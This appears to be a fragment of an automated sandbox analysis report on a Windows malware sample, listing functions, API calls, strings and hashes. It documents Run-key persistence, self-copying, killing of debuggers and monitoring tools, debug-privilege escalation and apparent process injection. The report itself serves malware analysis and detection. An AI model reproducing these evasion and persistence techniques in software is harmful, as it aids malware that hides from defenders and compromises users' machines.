                                                                                                                                                                    • Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383980
                                                                                                                                                                    • Part of subcall function 00007FF79E3838C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383AA9), ref: 00007FF79E383995
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 00007FF79E383AB9
                                                                                                                                                                  • DeleteFileW.KERNELBASE ref: 00007FF79E383AC4
                                                                                                                                                                  • CopyFileW.KERNELBASE ref: 00007FF79E383ADD
                                                                                                                                                                  • SetFileAttributesW.KERNELBASE ref: 00007FF79E383AF5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                  • String ID: Services
                                                                                                                                                                  • API String ID: 3209240227-2319745855
                                                                                                                                                                  • Opcode ID: be0043b295d9898150489b8ba5340aa22ed2e55b609d377a08c94104789181f7
                                                                                                                                                                  • Instruction ID: a328806d127c6a8af0ca2819e916a440b8aa48905cb98354049942cb4042b89e
                                                                                                                                                                  • Opcode Fuzzy Hash: be0043b295d9898150489b8ba5340aa22ed2e55b609d377a08c94104789181f7
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F014461A1858292EB70EB34E4D43AAD361FB94744FD0543ED65D836A9EE2CD24ECB20

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                  • String ID: %08lX%04lX%lu
                                                                                                                                                                  • API String ID: 3001812590-640692576
                                                                                                                                                                  • Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                  • Instruction ID: 1f3b3bc772ebd0d8fe16d59123dc7dda022dfa7397abd4d306415672de3c12ac
                                                                                                                                                                  • Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                  • Instruction Fuzzy Hash: 7031E92661C6C1C6DB30EB74E4983AAB3A0FB94744F90113AE68D87A59DB7DD509CB20

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                  • API String ID: 779948276-1428018034
                                                                                                                                                                  • Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                  • Instruction ID: 8cc0dc305db122fd82bbe90feb371b2a4c6c6cbcf3e5bc5baee5038da7be6800
                                                                                                                                                                  • Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                  • Instruction Fuzzy Hash: B711363551874086D7A09B64F48466AB7A0FB847A0F505339F96E43BE8DF7CD145CB10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 423 7ff79e383b24-7ff79e383b33 424 7ff79e383b48-7ff79e383b4c 423->424 425 7ff79e383b35-7ff79e383b42 VirtualFree 423->425 425->424
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                  • Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                  • Instruction ID: 742b56879350ddbe4bebf6f528756955a393c4dc161fec6b2645ee92e072ea0f
                                                                                                                                                                  • Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                  • Instruction Fuzzy Hash: D6D01221E3894181E7A5EB36E8C9719E3A1FBC4B44FC0803DE68981A68CF3CC1998F10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 426 7ff79e383b54-7ff79e383b7a VirtualAlloc
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                  • Opcode ID: b541e8117daad4751c7a279db5381b441ce47fb4f749190da09f5cfabf446e69
                                                                                                                                                                  • Instruction ID: b48659ed3f4f3b58b7e51f2d6ed5b12f84a1bdc8996fa092cee2866a5d84e8af
                                                                                                                                                                  • Opcode Fuzzy Hash: b541e8117daad4751c7a279db5381b441ce47fb4f749190da09f5cfabf446e69
                                                                                                                                                                  • Instruction Fuzzy Hash: 93C08CB1F26180C3DB2CEF32E491F0B6A21B784B40F90802CEA0287B84C93EC2528F00
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF79E381D19
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                  • API String ID: 2307068205-2771526726
                                                                                                                                                                  • Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                  • Instruction ID: d1fc5bc903f9c0e70c17b1db281cec73c3a2c1abd796d1d0b946c8ae356a0408
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                  • Instruction Fuzzy Hash: 7771E936518A8182E760EB64F49476AF7A1FBC4795F90103DFA8E83A68CF7CD5448B20
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                  • API String ID: 2379135442-2896544425
                                                                                                                                                                  • Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                  • Instruction ID: 77233013c4ecf5b924ad07673eb064b1a4dc79779acc63b9261fbe98346e3315
                                                                                                                                                                  • Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D415E3251CA8186E760DB61F48836AF7A1FBC4754F90413CEA9946E98CFBDD448CF60
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1083639309-0
                                                                                                                                                                  • Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                  • Instruction ID: 943cd27ebc5417e8b7cde1b9962fb94e4984ee03cd0507eabaf8e9a0a7df2e91
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                  • Instruction Fuzzy Hash: 53210031A0CA8681E770EB26E8C836AE361FFD4B54F90423DC55E826A8DF3DD455CB60
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 4073123320-2766056989
                                                                                                                                                                  • Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                  • Instruction ID: 46f509d6d3de4db944c8a1d6fb43fa095122eeeaf3700ac9716c1fcbf7815db1
                                                                                                                                                                  • Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                  • Instruction Fuzzy Hash: A141B232608A8586E770DB26E49436ABBE1F7C8B84F504129EA8D87B58DF7DD4488B50
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Version
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                  • Opcode ID: a034898b75751d47565587f8f48239afe675d10d53b418dd8b899e915f47bf55
                                                                                                                                                                  • Instruction ID: b2703330adffd0dd0919a051db70d1fa1cb0b0a53784ae9bfdff267c522893f2
                                                                                                                                                                  • Opcode Fuzzy Hash: a034898b75751d47565587f8f48239afe675d10d53b418dd8b899e915f47bf55
                                                                                                                                                                  • Instruction Fuzzy Hash: 7BF0623190D142D6EA759A21E588379E3E1EB99758FC0113DD28C03795DB3DD6488E36
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2693768547-0
                                                                                                                                                                  • Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                  • Instruction ID: 640c4d823c7c6f5d4deb01fcf0acb97dcae6c338938c810ca3239bc6ffa364a4
                                                                                                                                                                  • Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C81D132608B8186DB74DB65F48436AF7A1FBC9B91F504139EA9D83B68DF7CD0458B20
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF79E3845C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383117), ref: 00007FF79E38460C
                                                                                                                                                                    • Part of subcall function 00007FF79E3845C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383117), ref: 00007FF79E384649
                                                                                                                                                                    • Part of subcall function 00007FF79E3845C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E383117), ref: 00007FF79E384654
                                                                                                                                                                    • Part of subcall function 00007FF79E383B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79E38311C), ref: 00007FF79E383BC7
                                                                                                                                                                    • Part of subcall function 00007FF79E383B84: RegSetValueExW.ADVAPI32 ref: 00007FF79E383BFD
                                                                                                                                                                    • Part of subcall function 00007FF79E383B84: RegCloseKey.ADVAPI32 ref: 00007FF79E383C0C
                                                                                                                                                                    • Part of subcall function 00007FF79E383C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF79E383C3C
                                                                                                                                                                    • Part of subcall function 00007FF79E383E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF79E383E37
                                                                                                                                                                    • Part of subcall function 00007FF79E383E24: Process32FirstW.KERNEL32 ref: 00007FF79E383E6A
                                                                                                                                                                    • Part of subcall function 00007FF79E383E24: CloseHandle.KERNEL32 ref: 00007FF79E383E7C
                                                                                                                                                                    • Part of subcall function 00007FF79E383E24: wcscmp.MSVCRT ref: 00007FF79E383E91
                                                                                                                                                                    • Part of subcall function 00007FF79E383E24: OpenProcess.KERNEL32 ref: 00007FF79E383EA7
                                                                                                                                                                    • Part of subcall function 00007FF79E383E24: TerminateProcess.KERNEL32 ref: 00007FF79E383ECA
                                                                                                                                                                    • Part of subcall function 00007FF79E383E24: CloseHandle.KERNEL32 ref: 00007FF79E383ED8
                                                                                                                                                                    • Part of subcall function 00007FF79E383E24: Process32NextW.KERNEL32 ref: 00007FF79E383EEB
                                                                                                                                                                    • Part of subcall function 00007FF79E383E24: CloseHandle.KERNEL32 ref: 00007FF79E383EFD
                                                                                                                                                                    • Part of subcall function 00007FF79E3839B4: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF79E383B0C), ref: 00007FF79E3839E4
                                                                                                                                                                  • Sleep.KERNEL32 ref: 00007FF79E3831C6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                  • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                  • API String ID: 2853470409-928700279
                                                                                                                                                                  • Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                  • Instruction ID: 52b3f02c5ce18e7261b0d118b1b8c1ffbeb265c646865affe9df2e2356497e85
                                                                                                                                                                  • Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                  • Instruction Fuzzy Hash: 3F216261A1C94291EA24FB30E8D11B8E2A1AFA0754FD0563DE42D876F7DF6CF909C670
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                  • String ID: rbNSpGEsyb
                                                                                                                                                                  • API String ID: 299056699-189039185
                                                                                                                                                                  • Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                  • Instruction ID: e5ac6380751b41f8d0dc1260d70012094d10b48566fc6d6e36bc0f02a2c7517d
                                                                                                                                                                  • Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                  • Instruction Fuzzy Hash: 8F01002290CA01C2E730EB31E8C4269A771FBECB94F84013DE94E82674CF7CE6958631
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046898282.00007FF79E385000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046939007.00007FF79E387000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2046977105.00007FF79E388000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2047047825.00007FF79E38A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff79e380000_yINR7uQlPr.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 299056699-0
                                                                                                                                                                  • Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                  • Instruction ID: f8c056f43b564445872a0a698dc18f977ef4d589583c2e47be0439c601d23342
                                                                                                                                                                  • Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                  • Instruction Fuzzy Hash: 4A01DA2691CA42C2E730EB32E88426DA371FFE9B45F80013DE98E82674CF6CD954C631
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2046825981.00007FF79E381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79E380000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2046787824.00007FF79E380000.00000002.00000001.01000000.00000003.sdmpDownload File
